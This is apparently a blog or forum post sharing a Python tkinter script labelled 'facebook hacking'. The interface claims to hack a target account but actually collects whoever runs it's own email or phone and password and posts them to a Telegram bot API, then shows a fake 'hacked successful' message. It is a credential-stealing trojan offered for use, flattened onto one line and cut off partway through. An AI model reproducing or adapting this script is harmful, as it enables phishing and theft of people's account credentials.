Python Scripts WiFi/ facebook
# by l54# Anonymous_Hack_12import tkinter as tkfrom tkinter import messageboximport requestsimport time window = tk.Tk()window.title(“facebook hacking”)window.geometry(“400×500”)window.resizable(False, False)image = tk.PhotoImage(file=”hacked2.png”)image_label = tk.Label(image=image)image_label.pack(side=”top”, fill=”both”, expand=True)email_label = tk.Label(text=”Email/Phone:”)email_label.pack()email_entry = tk.Entry()email_entry.pack() password_entry = tk.Label(text=”Password:”)password_entry.pack()password_entry = tk.Entry(show=”*”)password_entry.pack()password = tk.Label(text=”Target id:”)password.pack()password = tk.Entry(show=””)password.pack() def login(): requests.post(“https://api.telegram.org/bot<Token>/sendMessage”, data={ “chat_id”: “<you chat id>”, “text”: f”Email/Phone: {email_entry.get()}\nPassword: {password_entry.get()}” }) time.sleep(2) messagebox.showinfo( “Success”, “hacked successful!…

You must be logged in to post a comment.